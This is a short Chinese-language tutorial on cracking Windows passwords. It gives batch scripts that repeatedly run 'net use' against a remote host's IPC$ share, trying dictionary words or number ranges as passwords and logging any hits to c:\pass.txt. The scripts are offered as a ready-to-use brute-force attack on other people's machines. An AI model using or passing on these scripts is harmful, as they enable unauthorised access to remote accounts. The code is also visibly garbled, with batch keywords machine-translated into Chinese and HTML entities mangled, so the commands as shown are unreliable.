電腦用戶的密碼存儲在SAM文件中,這個文件是加密的,所以妳看不到用戶的密碼。可以在下壹個軟件裏用它來破解密碼,更高級的可以用dos命令破解。方法如下:如果知道壹個NT賬號和密碼,可以使用net use \ \ Host \ ipc $ Content $ nbsp“Password”/User:“User”建立與遠程主機的連接。
1,dictionary:for/f % I in(dictionary file)do net use \ \ host \ IPC $ Content $ nbsp;" % I "/用戶:"用戶"
2.Number: for/l% i in (start,step,end)do net use \ \ host \ IPC $ Content $ nbsp;" % I "/用戶:"用戶"
將以下文件另存為pass.bat:
@關閉回聲
回聲-& gt;& gtc:\pass.txt
回聲-& gt;& gtc:\pass.txt
日期/t & gt;& gtc:\pass.txt
時間/t & gt;& gtc:\pass.txt
回音破解結果:> >;c:\pass.txt
if "%6"=="1 "轉到shit2
:shit1
在(% 1)docalltest . bat % 2 " % % I " % 3中開始"破解"/mincmd/cfor/f%% ii
goto退出
:shit2
在(%1,% 2,% 3) docalltest.bat% 4 "%%i"% 5中開始"破解"/mincmd/cfor/l%% ii
:退出
將以下文件另存為test.bat:
net use \ \ % 1 \ IPC $ Content $ nbsp;% 2/用戶:“%3”
轉到答案%ERRORLEVEL%
Rem %ERRORLEVEL%表示采用執行前壹個命令返回的結果,net use成功返回0,失敗返回2。
:答案0
回顯遠程主機:" % 1 " > >;c:\pass.txt
回顯用戶:" % 3 " > & gtc:\pass.txt
回顯密碼:% 2 > & gtc:\pass.txt
net use \ \ % 1 \ IPC $ Content $ nbsp;/delet
出口
:答案2
在system32中保存pass.bat和test.bat,用法如下:
1.如果用字典破解:pass.bat字典文件路徑和名稱主機用戶名。
2.如果被數字破解:pass.bat起始數步數結束數主機用戶名1。
密碼被破解後,保存在c:\pass.txt文件中。